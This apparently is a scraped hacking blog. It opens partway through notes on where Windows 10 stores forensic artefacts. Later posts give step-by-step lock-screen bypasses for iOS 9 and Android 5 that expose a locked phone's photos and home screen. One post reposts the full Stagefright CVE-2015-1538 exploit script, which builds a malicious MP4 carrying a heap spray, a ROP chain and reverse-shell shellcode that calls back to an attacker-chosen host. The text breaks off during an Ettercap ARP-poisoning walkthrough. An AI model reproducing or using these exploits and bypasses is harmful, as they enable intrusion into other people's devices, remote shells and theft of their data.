<br />- New web browser and rendering engine (Spartan)<br /><br />- Same as IE10, records no longer stored in Index.DAT files, stored in EDB<br /><br />- Edge settings are stored in the following file:<br /><br />\Users\user_name\AppData\Local\Packages\Microsoft.MicrosoftEdge_xxxxx\AC\MicrosoftEdge\User\Default\DataStore\Data\nouser1\xxxxx\DBStore\spartan.edb
<br /> <br />- Edge cache stored in the following directory:<br /><br />\Users\user_name\AppData\Local\Packages\Microsoft.MicrosoftEdge_xxxx\AC\#!001\MicrosoftEdge\Cache\<br /><br />- Last active browsing session stored: <br /><br />\Users\user_name\AppData\Local\Packages\Microsoft.MicrosoftEdge_xxxx\AC\MicrosoftEdge\User\Default\Recovery\Active\</div>
<div class="separator" style="clear: both; text-align: justify;">
</div>
<h3 style="text-align: left;">
Browser History Records </h3>
<div class="separator" style="clear: both; text-align: justify;">
<br />- Edge (and IE) history records stored in the following database:<br /><br />\Users\user_name\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.dat <br /><br />- This is actually an .EDB file<br />- Can be interpreted by EseDbViewer or ESEDatabaseView <br />- Might be a “dirty” dismount, need to use esentutl.exe<br />- Database also stores Cookies </div>
<h3 class="separator" style="clear: both; text-align: justify;">
</h3>
<h3 style="text-align: left;">
Internet Explorer (legacy)</h3>
<div class="separator" style="clear: both; text-align: justify;">
<br />- Internet Cache stored in this directory:<br /><br />\Users\user_name\AppData\Local\Microsoft\Windows\INetCache\<br /><br />- Internet Cookies stored in this directory:<br /><br />\Users\user_name\AppData\Local\Microsoft\Windows\INetCookies\</div>
<div class="separator" style="clear: both; text-align: justify;">
</div>
<div class="separator" style="clear: both; text-align: justify;">
</div>
<div class="separator" style="clear: both; text-align: justify;">
</div>
<div class="separator" style="clear: both; text-align: justify;">
</div>
<h3 style="text-align: left;">
Email (Mail application)</h3>
<div class="separator" style="clear: both; text-align: justify;">
<br />- Body of emails are stored in TXT or HTML format <br /><br />Can be analysed by a number of tools<br />Stored in the following directory:<br /><br />\Users\user_name\AppData\Local\Comms\Unistore\data\ <br /><br />- Metadata of emails are stored in the following DB (EDB format):<br /><br />\Users\user_name\AppData\Local\Comms\UnistoreDB\store.vol <br /><br />- Attachments<br />- Email header<br />- Contact information</div>
<div class="separator" style="clear: both; text-align: justify;">
</div>
<h3 style="text-align: left;">
Unified Communication </h3>
<div class="separator" style="clear: both; text-align: justify;">
<br />- Unified Communication (UC) is a built-in Microsoft application
that brings together all of the following social media platforms (by
default):<br /><br />Appears to be scaled back from Windows 8.x (less integrated as previous People App)<br /><br />- UC settings are stored in the following DB:<br /><br />\Users\user_name\AppData\Local\Packages\microsoft.windowscommunicationsapps…\LocalState\livecomm.edb </div>
<div class="separator" style="clear: both; text-align: justify;">
</div>
<div style="text-align: left;">
<b>Interesting Tables:</b></div>
<div class="separator" style="clear: both; text-align: justify;">
<br />- Account<br />SourceID<br />List of accounts (e.g WL = Windows Live, Skype, TWITR, LI = LinkedIn)<br />DomainTag<br />Username for each account<br /><br />- Contact<br />List of synched contacts across all account platforms<br /><br />- Event<br />Calendar entries (including birthdays of contacts if synched to Windows Live) and locations<br /><br />- MeContact<br />Further details about owner accounts<br /><br />-Person and PersonLink<br />Further details about each contact including what account they link back to (e.g Skype)</div>
<div class="separator" style="clear: both; text-align: justify;">
</div>
<div class="separator" style="clear: both; text-align: justify;">
<br />- Locally cached contact entries are stored in this directory:<br /><br />\Users\user_name\AppData\Local\Packages\microsoft.windowscommunicationsapps_xxxxx\LocalState\Indexed\LiveComm\xxxxx\xxxxx\People\AddressBook\<br /> <br />- Contact photos are stored in this directory (JPGs):<br /><br />\Users\user_name\AppData\Local\Packages\microsoft.windowscommunicationsapps_xxxx\LocalState\LiveComm\xxxx\xxxx\UserTiles\</div>
<div class="separator" style="clear: both; text-align: justify;">
</div>
<h3 style="text-align: left;">
Twitter App</h3>
<div class="separator" style="clear: both; text-align: justify;">
<br />- History DB located in following file:<br /><br />\Users\user_name\AppData\Local\Packages\xxxx.Twitter_xxxxxxx\LocalState\twitter_user_id\twitter.sqlite<br /><br />- SQLite3 format DB<br /><br />11 Tables in DB<br /><br />Relevant tables:<br />- messages – holds tweets & DMs<br />- search_queries – holds searches conducted in Twitter app by user<br />- statuses – lists latest tweets from accounts being followed<br />- users – lists user account and accounts being followed by user</div>
<div class="separator" style="clear: both; text-align: justify;">
</div>
<div class="separator" style="clear: both; text-align: justify;">
- Settings located in file:<br /><br />\Users\user_name\AppData\Local\Packages\xxxxx.Twitter_xxxx\Settings\settings.dat<br /><br />- Includes user name (@xxxxx)<br />- Details on profile picture URL<br />- Twitter ID number</div>
<div class="separator" style="clear: both; text-align: justify;">
</div>
<h3 style="text-align: left;">
Skype App (legacy)</h3>
<div class="separator" style="clear: both; text-align: justify;">
<br />- The Skype App was discontinued with Windows 10 <br /><br />Windows 10 prompts you to download the desktop Skype application </div>
<div class="separator" style="clear: both; text-align: justify;">
</div>
<h3 style="text-align: left;">
OneDrive App</h3>
<div class="separator" style="clear: both; text-align: justify;">
<br />- Built-in by default, API allows all programs to save files in OneDrive<br /><br />- List of Synced items located in file:<br />\Users\user_name\AppData\Local\Microsoft\Windows\OneDrive\settings\xxxxxxxx.dat<br /><br />- Locally cached items are stored in directory:<br />\Users\user_name\OneDrive\</div>
<div class="separator" style="clear: both; text-align: justify;">
</div>
<h3 style="text-align: left;">
Microsoft Office Apps</h3>
<div class="separator" style="clear: both; text-align: justify;">
<br />- With the release of the Windows Insider program Microsoft introduced the Office Mobile Apps<br /><br />If you have a valid Office365 account then you can edit and create documents<br />Otherwise these Apps are read-only</div>
<div class="separator" style="clear: both; text-align: justify;">
</div>
<h3 style="text-align: left;">
Word App</h3>
<div class="separator" style="clear: both; text-align: justify;">
<br />- List of recent documents stored in the following file (XML):<br /><br />\Users\user_name\AppData\Local\Packages\Microsoft.Office.Word_xxxx\LocalState\AppData\Local\Office\16.0\MruServiceCache\xxxx_LiveId\Excel\Documents_en-AU<br /><br />- Cached files stored in this directory:<br /><br />\Users\user_name\AppData\Local\Packages\Microsoft.Office.Word_xxxx\LocalState\OfficeFileCache\ <br /><br />- Files stored as .FSD extension - actually data embedded<br />- Can be manually carved from FSD file</div>
<h3 style="text-align: left;">
Excel App</h3>
<div class="separator" style="clear: both; text-align: justify;">
<br />- List of recent documents stored in the following file (XML):<br /><br />\Users\user_name\AppData\Local\Packages\Microsoft.Office.Excel_xxxx\LocalState\AppData\Local\Office\16.0\MruServiceCache\xxxx_LiveId\Excel\Documents_en-AU<br /><br />- Cached files stored in this directory:<br /><br />\Users\user_name\AppData\Local\Packages\Microsoft.Office.Excel_xxxx\LocalState\OfficeFileCache\<br /><br />Files stored as .FSD extension actually data embedded<br />Can be manually carved from FSD file</div>
<div class="separator" style="clear: both; text-align: justify;">
</div>
<h3 style="text-align: left;">
PowerPoint App</h3>
<div class="separator" style="clear: both; text-align: justify;">
<br />- List of recent documents stored in the following file (XML):<br /><br />\Users\user_name\AppData\Local\Packages\Microsoft.Office.PowerPoint_xxxx\LocalState\AppData\Local\Office\16.0\MruServiceCache\xxxx_LiveId\Excel\Documents_en-AU<br /><br />- Cached files stored in this directory:<br /><br />\Users\user_name\AppData\Local\Packages\Microsoft.Office.PowerPoint_xxxx\LocalState\OfficeFileCache\<br /> <br />Files stored as .FSD extension - actually data embedded<br />Can be manually carved from FSD file</div>
<div class="separator" style="clear: both; text-align: justify;">
</div>
<h3 class="separator" style="clear: both; text-align: justify;">
OneNote App</h3>
<div class="separator" style="clear: both; text-align: justify;">
</div>
<div class="separator" style="clear: both; text-align: justify;">
Cached files stored in this directory:<br /><br />\Users\user_name\AppData\Local\Packages\Microsoft.Office.OneNote_xxxx\LocalState\AppData\Local\OneNote\16.0\ <br /><br />- Files stored as xxxx.bin extension <br />Encoded binary files <br />Embedded graphics such as PNG or JPG</div>
<div class="separator" style="clear: both; text-align: justify;">
</div>
<h3 style="text-align: left;">
Maps App</h3>
<div class="separator" style="clear: both; text-align: justify;">
<br />- Recent places stored in this file (XML):<br />\Users\user_name\AppData\Local\Packages\Microsoft.WindowsMaps_xxxx\LocalState\Graph\xxxx\Me\00000000.ttl<br /><br />Latitude/Longitude<br />Dates modified (searched)</div>
<h3 class="separator" style="clear: both; text-align: justify;">
</h3>
<h3 style="text-align: left;">
Memory Acquisition</h3>
<div class="separator" style="clear: both; text-align: justify;">
<br />- WinPMEM (tested versions 1.6.2 & 2.0.1):<br /><br />Run as Administrator<br />Has to extract driver to local temp location<br />V1.6.2 running process ~10MB<br />V2.0.1 running process ~80MB<br /><br />- FTK Imager:<br /><br />Run as Administrator<br />Running process ~15MB</div>
<h3 class="separator" style="clear: both; text-align: justify;">
</h3>
<h3 style="text-align: left;">
Live Disk Acquisition</h3>
<div class="separator" style="clear: both; text-align: justify;">
<br />- FTK Imager<br /><br />Can be used for Physical or Logical acquisition<br /><br />- X-Ways Forensics<br /><br />Can be used for Physical or Logical acquisition<br /></div>
<h3 style="text-align: left;">
Sources: </h3>
<a href="http://www.slideshare.net/bsmuir/windows-10-forensics-os-evidentiary-artefacts">Presentation</a><br />
<a href="http://accessdata.com/product-download?/support/product-downloads">FTK Imager</a><br />
<a href="http://www.nirsoft.net/utils/ese_database_view.html">Nirsoft ESEDatabaseView</a><br />
<a href="https://lockandcode.com/software/registry_browser">RegistryBrowser</a><br />
<a href="https://github.com/google/rekall/releases">WinPMEM</a>
</div>
BlackBarbie-bbhttp://www.blogger.com/profile/03407685720956138113noreply@blogger.com5tag:blogger.com,1999:blog-4509349481580895365.post-61232478975237415392015-09-24T13:56:00.000+05:302015-09-24T13:56:00.970+05:30Hack photo library of ios9<div dir="ltr" style="text-align: left;" trbidi="on">
instructions to bypass the passcode:
<br />
<ul>
<li>Take the Apple device running the iOS 9 and enter an incorrect passcode four times.</li>
<li>Depending on the length of your passcode, for the fifth attempt
enter 3 or 5 digits and for the last one, press and hold the Home button
to run Siri immediately followed by the 4th digit.</li>
<li>Once Siri appears, ask the assistant for the time.</li>
<li>Tap the Clock icon to open the Clock app, and add a new Clock, then write anything in the Choose a City field.</li>
<li>Now double tap on the word you wrote to invoke the copy & paste menu, Select All and then click on “Share”.</li>
<li>Tap the ‘Message’ icon in the Share Sheet, and again type something
random, hit Return and double tap on the contact name on the top.</li>
<li>Select “Create New Contact,” and Tap on “Add Photo” and then on “Choose Photo”.</li>
<li>At this point, you’ll now be able to access the entire photo library
on the iOS device, which is still locked with a passcode. Now browse
and view any photo from the Photo album individually.</li>
</ul>
hope it helps </div>
BlackBarbie-bbhttp://www.blogger.com/profile/03407685720956138113noreply@blogger.com5tag:blogger.com,1999:blog-4509349481580895365.post-32911250097503178192015-09-17T09:41:00.001+05:302015-09-17T09:41:35.723+05:30Exploiting android 5.0 to unlock the session<div dir="ltr" style="text-align: left;" trbidi="on">
The security researcher <i>John Gordon</i> has discovered a very
simple way to bypass the mobile lock feature implemented on smartphones
running Android 5.0 and 5.1 (Build LMY48M).<br />
Mechanisms like Password lock, Pattern lock and PIN lock are used by
almost every mobile user to protect his device from unauthorized
physical access.<br />
Gordon discovered a vulnerability that could be exploited to unlock an Android smartphone (<i>5.0 build LMY48I</i>)
with locked screen. The operation causes the crash of the user
interface for the password screen and open the doors of the device.<br />
The vulnerability dubbed as “Elevation of Privilege Vulnerability in Lockscreen” has been coded as CVE-2015-3860.<br />
Below the <a href="http://thehackernews.com/2015/09/bypass-android-lockscreen.html" target="_blank">steps</a> to unlock the screen by forcing the camera app crash.<br />
<ul>
<li><em>Get the device and open the Emergency dialer screen.</em></li>
<li><em>Type a long string of numbers or special characters in the input
field and copy-n-paste a long string continuously till its limit
exhausts.</em></li>
<li><em>Now, copy that large string.</em></li>
<li><em>Open up the camera app accessible without a lock.</em></li>
<li><em>Drag the notification bar and push the settings icon, which will show a prompt for the password.</em></li>
<li><em>Now, paste the earlier copied string continuously to the input field of the password, to create an even larger string.</em></li>
<li><em>Come back to </em>camera <em>and divert yourself towards
clicking pictures or increasing/decreasing the volume button with
simultaneously tapping the password input field containing the large
string in multiple places.</em></li>
</ul>
The Android user will notice the soft buttons (home and back button)
at the bottom of the screen will disappear when the camera app is going
to become unresponsive. Suddenly the app will crash and get user to the
Home Screen of the device.<br />
<a href="http://securityaffairs.co/wordpress/wp-content/uploads/2015/09/android-5-hack.jpg"><img alt="android 5 hack" class="aligncenter wp-image-40187" height="281" src="http://securityaffairs.co/wordpress/wp-content/uploads/2015/09/android-5-hack.jpg" width="500" /></a><br />
<br />
<span class="embed-youtube" style="display: block; text-align: center;"><br /></span><span class="embed-youtube" style="display: block; text-align: center;">Notably : Google have already released patch for it,but if you have not yet updated the phone ,kindly update it</span><span class="embed-youtube" style="display: block; text-align: center;"><br /></span><br />
<span class="embed-youtube" style="display: block; text-align: center;"><br /></span></div>
BlackBarbie-bbhttp://www.blogger.com/profile/03407685720956138113noreply@blogger.com4tag:blogger.com,1999:blog-4509349481580895365.post-48763989855082287132015-09-14T16:58:00.000+05:302015-09-14T16:58:18.053+05:30Stagefright vulnerablity code <div dir="ltr" style="text-align: left;" trbidi="on">
Recently zimperium announced stagefright bug in android and inorder to exploit the developers have released the code of it<br />
<br />
<br />
Code <a href="https://raw.githubusercontent.com/jduck/cve-2015-1538-1/master/Stagefright_CVE-2015-1538-1_Exploit.py" target="_blank">source</a> :<br />
<br />
<pre>#!/usr/bin/env python
# Joshua J. Drake (@jduck) of ZIMPERIUM zLabs
# Shout outs to our friends at Optiv (formerly Accuvant Labs)
# (C) Joshua J. Drake, ZIMPERIUM Inc, Mobile Threat Protection, 2015
# www.zimperium.com
#
# Exploit for RCE Vulnerability CVE-2015-1538 #1
# Integer Overflow in the libstagefright MP4 'stsc' atom handling
#
# Don't forget, the output of "create_mp4" can be delivered many ways!
# MMS is the most dangerous attack vector, but not the only one...
#
# DISCLAIMER: This exploit is for testing and educational purposes only. Any
# other usage for this code is not allowed. Use at your own risk.
#
# "With great power comes great responsibility." - Uncle Ben
#
import struct
import socket
#
# Creates a single MP4 atom - LEN, TAG, DATA
#
def make_chunk(tag, data):
if len(tag) != 4:
raise 'Yo! They call it "FourCC" for a reason.'
ret = struct.pack('>L', len(data) + 8)
ret += tag
ret += data
return ret
#
# Make an 'stco' atom - Sample Table Chunk Offets
#
def make_stco(extra=''):
ret = struct.pack('>L', 0) # version
ret += struct.pack('>L', 0) # mNumChunkOffsets
return make_chunk('stco', ret+extra)
#
# Make an 'stsz' atom - Sample Table Size
#
def make_stsz(extra=''):
ret = struct.pack('>L', 0) # version
ret += struct.pack('>L', 0) # mDefaultSampleSize
ret += struct.pack('>L', 0) # mNumSampleSizes
return make_chunk('stsz', ret+extra)
#
# Make an 'stts' atom - Sample Table Time-to-Sample
#
def make_stts():
ret = struct.pack('>L', 0) # version
ret += struct.pack('>L', 0) # mTimeToSampleCount
return make_chunk('stts', ret)
#
# This creates a single Sample Table Sample-to-Chunk entry
#
def make_stsc_entry(start, per, desc):
ret = ''
ret += struct.pack('>L', start + 1)
ret += struct.pack('>L', per)
ret += struct.pack('>L', desc)
return ret
#
# Make an 'stsc' chunk - Sample Table Sample-to-Chunk
#
# If the caller desires, we will attempt to trigger (CVE-2015-1538 #1) and
# cause a heap overflow.
#
def make_stsc(num_alloc, num_write, sp_addr=0x42424242, do_overflow = False):
ret = struct.pack('>L', 0) # version/flags
# this is the clean version...
if not do_overflow:
ret += struct.pack('>L', num_alloc) # mNumSampleToChunkOffsets
ret += 'Z' * (12 * num_alloc)
return make_chunk('stsc', ret)
# now the explicit version. (trigger the bug)
ret += struct.pack('>L', 0xc0000000 + num_alloc) # mNumSampleToChunkOffsets
# fill in the entries that will overflow the buffer
for x in range(0, num_write):
ret += make_stsc_entry(sp_addr, sp_addr, sp_addr)
ret = make_chunk('stsc', ret)
# patch the data_size
ret = struct.pack('>L', 8 + 8 + (num_alloc * 12)) + ret[4:]
return ret
#
# Build the ROP chain
#
# ROP pivot by Georg Wicherski! Thanks!
#
"""
(gdb) x/10i __dl_restore_core_regs
0xb0002850 <__dl_restore_core_regs>: add r1, r0, #52 ; 0x34
0xb0002854 <__dl_restore_core_regs+4>: ldm r1, {r3, r4, r5}
0xb0002858 <__dl_restore_core_regs+8>: push {r3, r4, r5}
0xb000285c <__dl_restore_core_regs+12>: ldm r0, {r0, r1, r2, r3, r4, r5, r6, r7, r8, r9, r10, r11}
0xb0002860 <__dl_restore_core_regs+16>: ldm sp, {sp, lr, pc}
"""
"""
b0001144 <__dl_mprotect>:
b0001144: e92d0090 push {r4, r7}
b0001148: e3a0707d mov r7, #125 ; 0x7d
b000114c: ef000000 svc 0x00000000
b0001150: e8bd0090 pop {r4, r7}
b0001154: e1b00000 movs r0, r0
b0001158: 512fff1e bxpl lr
b000115c: ea0015cc b b0006894 <__dl_raise+0x10>
"""
def build_rop(off, sp_addr, newpc_val, cb_host, cb_port):
rop = ''
rop += struct.pack('<L', sp_addr + off + 0x10) # new sp
rop += struct.pack('<L', 0xb0002a98) # new lr - pop {pc}
rop += struct.pack('<L', 0xb00038b2+1) # new pc: pop {r0, r1, r2, r3, r4, pc}
rop += struct.pack('<L', sp_addr & 0xfffff000) # new r0 - base address (page aligned)
rop += struct.pack('<L', 0x1000) # new r1 - length
rop += struct.pack('<L', 7) # new r2 - protection
rop += struct.pack('<L', 0xd000d003) # new r3 - scratch
rop += struct.pack('<L', 0xd000d004) # new r4 - scratch
rop += struct.pack('<L', 0xb0001144) # new pc - _dl_mprotect
native_start = sp_addr + 0x80
rop += struct.pack('<L', native_start) # address of native payload
#rop += struct.pack('<L', 0xfeedfed5) # top of stack...
# linux/armle/shell_reverse_tcp (modified to pass env and fork/exit)
buf = ''
# fork
buf += '\x02\x70\xa0\xe3'
buf += '\x00\x00\x00\xef'
# continue if not parent...
buf += '\x00\x00\x50\xe3'
buf += '\x02\x00\x00\x0a'
# exit parent
buf += '\x00\x00\xa0\xe3'
buf += '\x01\x70\xa0\xe3'
buf += '\x00\x00\x00\xef'
# setsid in child
buf += '\x42\x70\xa0\xe3'
buf += '\x00\x00\x00\xef'
# socket/connect/dup2/dup2/dup2
buf += '\x02\x00\xa0\xe3\x01\x10\xa0\xe3\x05\x20\x81\xe2\x8c'
buf += '\x70\xa0\xe3\x8d\x70\x87\xe2\x00\x00\x00\xef\x00\x60'
buf += '\xa0\xe1\x6c\x10\x8f\xe2\x10\x20\xa0\xe3\x8d\x70\xa0'
buf += '\xe3\x8e\x70\x87\xe2\x00\x00\x00\xef\x06\x00\xa0\xe1'
buf += '\x00\x10\xa0\xe3\x3f\x70\xa0\xe3\x00\x00\x00\xef\x06'
buf += '\x00\xa0\xe1\x01\x10\xa0\xe3\x3f\x70\xa0\xe3\x00\x00'
buf += '\x00\xef\x06\x00\xa0\xe1\x02\x10\xa0\xe3\x3f\x70\xa0'
buf += '\xe3\x00\x00\x00\xef'
# execve(shell, argv, env)
buf += '\x30\x00\x8f\xe2\x04\x40\x24\xe0'
buf += '\x10\x00\x2d\xe9\x38\x30\x8f\xe2\x08\x00\x2d\xe9\x0d'
buf += '\x20\xa0\xe1\x10\x00\x2d\xe9\x24\x40\x8f\xe2\x10\x00'
buf += '\x2d\xe9\x0d\x10\xa0\xe1\x0b\x70\xa0\xe3\x00\x00\x00'
buf += '\xef\x02\x00'
# Add the connect back host/port
buf += struct.pack('!H', cb_port)
cb_host = socket.inet_aton(cb_host)
buf += struct.pack('=4s', cb_host)
# shell -
buf += '/system/bin/sh\x00\x00'
# argv -
buf += 'sh\x00\x00'
# env -
buf += 'PATH=/sbin:/vendor/bin:/system/sbin:/system/bin:/system/xbin\x00'
# Add some identifiable stuff, just in case something goes awry...
rop_start_off = 0x34
x = rop_start_off + len(rop)
while len(rop) < 0x80 - rop_start_off:
rop += struct.pack('<L', 0xf0f00000+x)
x += 4
# Add the native payload...
rop += buf
return rop
#
# Build an mp4 that exploits CVE-2015-1538 #1
#
# We mimic meow.3gp here...
#
def create_mp4(sp_addr, newpc_val, cb_host, cb_port):
chunks = []
# Build the MP4 header...
ftyp = 'mp42'
ftyp += struct.pack('>L', 0)
ftyp += 'mp42'
ftyp += 'isom'
chunks.append(make_chunk('ftyp', ftyp))
# Note, this causes a few allocations...
moov_data = ''
moov_data += make_chunk('mvhd',
struct.pack('>LL', 0, 0x41414141) +
('B' * 0x5c) )
# Add a minimal, verified trak to satisfy mLastTrack being set
moov_data += make_chunk('trak',
make_chunk('stbl',
make_stsc(0x28, 0x28) +
make_stco() +
make_stsz() +
make_stts() ))
# Spray the heap using a large tx3g chunk (can contain binary data!)
"""
0x4007004e <_ZNK7android7RefBase9decStrongEPKv+2>: ldr r4, [r0, #4] ; load mRefs
0x40070050 <_ZNK7android7RefBase9decStrongEPKv+4>: mov r5, r0
0x40070052 <_ZNK7android7RefBase9decStrongEPKv+6>: mov r6, r1
0x40070054 <_ZNK7android7RefBase9decStrongEPKv+8>: mov r0, r4
0x40070056 <_ZNK7android7RefBase9decStrongEPKv+10>: blx 0x40069884 ; atomic_decrement
0x4007005a <_ZNK7android7RefBase9decStrongEPKv+14>: cmp r0, #1 ; must be 1
0x4007005c <_ZNK7android7RefBase9decStrongEPKv+16>: bne.n 0x40070076 <_ZNK7android7RefBase9decStrongEPKv+42>
0x4007005e <_ZNK7android7RefBase9decStrongEPKv+18>: ldr r0, [r4, #8] ; load refs->mBase
0x40070060 <_ZNK7android7RefBase9decStrongEPKv+20>: ldr r1, [r0, #0] ; load mBase._vptr
0x40070062 <_ZNK7android7RefBase9decStrongEPKv+22>: ldr r2, [r1, #12] ; load method address
0x40070064 <_ZNK7android7RefBase9decStrongEPKv+24>: mov r1, r6
0x40070066 <_ZNK7android7RefBase9decStrongEPKv+26>: blx r2 ; call it!
"""
page = ''
off = 0 # the offset to the next object
off += 8
page += struct.pack('<L', sp_addr + 8 + 16 + 8 + 12 - 28) # _vptr.RefBase (for when we smash mDataSource)
page += struct.pack('<L', sp_addr + off) # mRefs
off += 16
page += struct.pack('<L', 1) # mStrong
page += struct.pack('<L', 0xc0dedbad) # mWeak
page += struct.pack('<L', sp_addr + off) # mBase
page += struct.pack('<L', 16) # mFlags (dont set OBJECT_LIFETIME_MASK)
off += 8
page += struct.pack('<L', sp_addr + off) # the mBase _vptr.RefBase
page += struct.pack('<L', 0xf00dbabe) # mBase.mRefs (unused)
off += 16
page += struct.pack('<L', 0xc0de0000 + 0x00) # vtable entry 0
page += struct.pack('<L', 0xc0de0000 + 0x04) # vtable entry 4
page += struct.pack('<L', 0xc0de0000 + 0x08) # vtable entry 8
page += struct.pack('<L', newpc_val) # vtable entry 12
rop = build_rop(off, sp_addr, newpc_val, cb_host, cb_port)
x = len(page)
while len(page) < 4096:
page += struct.pack('<L', 0xf0f00000+x)
x += 4
off = 0x34
page = page[:off] + rop + page[off+len(rop):]
spray = page * (((2*1024*1024) / len(page)) - 20)
moov_data += make_chunk('tx3g', spray)
block = 'A' * 0x1c
bigger = 'B' * 0x40
udta = make_chunk('udta',
make_chunk('meta',
struct.pack('>L', 0) +
make_chunk('ilst',
make_chunk('cpil', make_chunk('data', struct.pack('>LL', 21, 0) + 'A')) +
make_chunk('trkn', make_chunk('data', struct.pack('>LL', 0, 0) + 'AAAABBBB')) +
make_chunk('disk', make_chunk('data', struct.pack('>LL', 0, 0) + 'AAAABB')) +
make_chunk('covr', make_chunk('data', struct.pack('>LL', 0, 0) + block)) * 32 +
make_chunk('\xa9alb', make_chunk('data', struct.pack('>LL', 0, 0) + block)) +
make_chunk('\xa9ART', make_chunk('data', struct.pack('>LL', 0, 0) + block)) +
make_chunk('aART', make_chunk('data', struct.pack('>LL', 0, 0) + block)) +
make_chunk('\xa9day', make_chunk('data', struct.pack('>LL', 0, 0) + block)) +
make_chunk('\xa9nam', make_chunk('data', struct.pack('>LL', 0, 0) + block)) +
make_chunk('\xa9wrt', make_chunk('data', struct.pack('>LL', 0, 0) + block)) +
make_chunk('gnre', make_chunk('data', struct.pack('>LL', 1, 0) + block)) +
make_chunk('covr', make_chunk('data', struct.pack('>LL', 0, 0) + block)) * 32 +
make_chunk('\xa9ART', make_chunk('data', struct.pack('>LL', 0, 0) + bigger)) +
make_chunk('\xa9wrt', make_chunk('data', struct.pack('>LL', 0, 0) + bigger)) +
make_chunk('\xa9day', make_chunk('data', struct.pack('>LL', 0, 0) + bigger)))
)
)
moov_data += udta
# Make the nasty trak
tkhd1 = ''.join([
'\x00', # version
'D' * 3, # padding
'E' * (5*4), # {c,m}time, id, ??, duration
'F' * 0x10, # ??
struct.pack('>LLLLLL',
0x10000, # a00
0, # a01
0, # dx
0, # a10
0x10000, # a11
0), # dy
'G' * 0x14
])
trak1 = ''
trak1 += make_chunk('tkhd', tkhd1)
mdhd1 = ''.join([
'\x00', # version
'D' * 0x17, # padding
])
mdia1 = ''
mdia1 += make_chunk('mdhd', mdhd1)
mdia1 += make_chunk('hdlr', 'F' * 0x3a)
dinf1 = ''
dinf1 += make_chunk('dref', 'H' * 0x14)
minf1 = ''
minf1 += make_chunk('smhd', 'G' * 0x08)
minf1 += make_chunk('dinf', dinf1)
# Build the nasty sample table to trigger the vulnerability here.
stbl1 = make_stsc(3, (0x1200 / 0xc) - 1, sp_addr, True) # TRIGGER
# Add the stbl to the minf chunk
minf1 += make_chunk('stbl', stbl1)
# Add the minf to the mdia chunk
mdia1 += make_chunk('minf', minf1)
# Add the mdia to the track
trak1 += make_chunk('mdia', mdia1)
# Add the nasty track to the moov data
moov_data += make_chunk('trak', trak1)
# Finalize the moov chunk
moov = make_chunk('moov', moov_data)
chunks.append(moov)
# Combine outer chunks together and voila.
data = ''.join(chunks)
return data
if __name__ == '__main__':
import sys
import mp4
import argparse
def write_file(path, content):
with open(path, 'wb') as f:
f.write(content)
def addr(sval):
if sval.startswith('0x'):
return int(sval, 16)
return int(sval)
# The address of a fake StrongPointer object (sprayed)
sp_addr = 0x41d00010 # takju @ imm76i - 2MB (via hangouts)
# The address to of our ROP pivot
newpc_val = 0xb0002850 # point sp at __dl_restore_core_regs
# Allow the user to override parameters
parser = argparse.ArgumentParser()
parser.add_argument('-c', '--connectback-host', dest='cbhost', default='31.3.3.7')
parser.add_argument('-p', '--connectback-port', dest='cbport', type=int, default=12345)
parser.add_argument('-s', '--spray-address', dest='spray_addr', type=addr, default=None)
parser.add_argument('-r', '--rop-pivot', dest='rop_pivot', type=addr, default=None)
parser.add_argument('-o', '--output-file', dest='output_file', default='cve-2015-1538-1.mp4')
args = parser.parse_args()
if len(sys.argv) == 1:
parser.print_help()
sys.exit(-1)
if args.spray_addr == None:
args.spray_addr = sp_addr
if args.rop_pivot == None:
args.rop_pivot = newpc_val
# Build the MP4 file...
data = mp4.create_mp4(args.spray_addr, args.rop_pivot, args.cbhost, args.cbport)
print('[*] Saving crafted MP4 to %s ...' % args.output_file)
write_file(args.output_file, data) </pre>
<pre> </pre>
<pre><b>use at your own riskk and dont test devices which you were unauthorized </b></pre>
</div>
BlackBarbie-bbhttp://www.blogger.com/profile/03407685720956138113noreply@blogger.com2tag:blogger.com,1999:blog-4509349481580895365.post-52390252983301815902015-09-14T11:14:00.001+05:302015-09-14T11:14:39.777+05:30Arp Poisoning using Kali<div dir="ltr" style="text-align: left;" trbidi="on">
Hi friends and readers<br />
<br />
today i am gonna share the arp poisoning attack tutorial ,<br />
<br />
what we can achieve using it were :<br />
<br />
a)we can spoof network and manage to capture the entire network traffic<br />
<br />
there were dozen ways to achieve it ,for those who puzzled about how to capture network traffic <br />
<br />
<h3>
Launching an ARP Poisoning Attack</h3>
We have already explained about why we need ARP and the conceptual explanation of ARP cache poisoning in <a href="http://www.thegeekstuff.com/2012/01/arp-cache-poisoning/">ARP-Cache-Poisoning</a>. So please have a look into it, and this article will cover how to perform it practically.<br />
The following diagram explains the network architecture. All the
attacks explained here will be performed on the following network
diagram only. Using Ettercap in a production environment is not
advisable.<br />
<img alt="" class="aligncenter size-full wp-image-10713" height="412" src="http://static.thegeekstuff.com/wp-content/uploads/2012/06/ettercap-arch.png" title="ettercap architecture" width="524" /><br />
Launch Ettercap using the following command in the 122 machine.<br />
<pre># ettercap -G</pre>
Click “Sniff->Unified Sniffing”. It will list the available
network interface as shown below. Choose the one which you want to use
for ARP Poisoning.<br />
<img alt="" class="aligncenter size-full wp-image-10701" height="102" src="http://static.thegeekstuff.com/wp-content/uploads/2012/06/ettercap2.png" title="ettercap choose interface" width="300" /><br />
Once you have chosen the interface the following window will open:<br />
<img alt="" class="aligncenter size-full wp-image-10702" height="358" src="http://static.thegeekstuff.com/wp-content/uploads/2012/06/ettercap3.png" title="ettercap launch" width="475" /><br />
The next step is to add the target list for performing the ARP
poisoning. Here we will add 192.168.1.51 and 192.168.1.10 as the target
as follows.<br />
Click “Hosts->Scan for Host”.<br />
It will start to scan the hosts present in the network.<br />
Once it is completed, click “Hosts->Host List”. It will list the available hosts in the LAN as follows:<br />
<img alt="" class="aligncenter size-full wp-image-10704" height="456" src="http://static.thegeekstuff.com/wp-content/uploads/2012/06/ettercap4.png" title="ettercap add to target" width="375" /><br />
Now among the list, select “192.168.1.51” and click “Add to Target 1″ and select “192.168.1.10” and click “Add to Target 2″.<br />
Now select “Mitm->Arp Poisoning” as follows:<br />
<img alt="" class="aligncenter size-full wp-image-10705" height="201" src="http://static.thegeekstuff.com/wp-content/uploads/2012/06/ettercap5.png" title="ettercap arp poisoning" width="579" /><br />
The following dialog box will open. Select “Sniff Remote Connection” and click “ok”:<br />
<img alt="" class="aligncenter size-full wp-image-10706" height="172" src="http://static.thegeekstuff.com/wp-content/uploads/2012/06/ettercap6.png" title="ettercap sniff remote connection" width="300" /><br />
Then click “Start->Start Sniffing as follows:<br />
